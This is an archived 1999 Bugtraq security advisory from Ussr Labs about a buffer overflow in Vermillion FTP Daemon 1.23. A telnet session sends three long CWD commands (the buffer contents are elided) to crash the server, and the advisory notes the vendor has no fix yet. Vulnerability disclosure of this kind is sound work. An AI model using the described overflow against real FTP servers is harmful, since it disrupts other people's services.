Computer Security

Archive : 1999 : november : vftpd
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku





Новости




Новости






=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Пн, 22 ноя 1999  16:08:39

   От: Ussr Labs <labs@USSRBACK.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23 Vulnerability

--------------------------------------------------------------------------------




Remote DoS Attack in Vermillion FTP Daemon (VFTPD) v1.23 Vulnerability



PROBLEM



UssrLabs found a Local/Remote DoS Attack in Vermillion FTP Daemon (VFTPD)

v1.23,

The buffer overflow is caused by a 3 times long cwd, 504 characters,



Example:

[gimmemore@itsme]$ telnet example.com 21

Trying example.com...

Connected to example.com.

Escape character is '^]'.

220 itsme FTP Server (vftpd 1.23) ready.

USER itsme

PASS ******

CWD (buffer)

CWD (buffer)

CWD (buffer)



Overflow.



For the source / binary of this remote / local D.O.S



Vendor Status:



Contacted



vendor: ARCANE SOFTWARE



Vendor   Url:  http://www.arcanesoft.com/

Program Url: http://www.arcanesoft.com/files/vftpd123.exe



Credit: USSRLABS



SOLUTION

    Nothing yet.



u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

http://www.ussrback.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server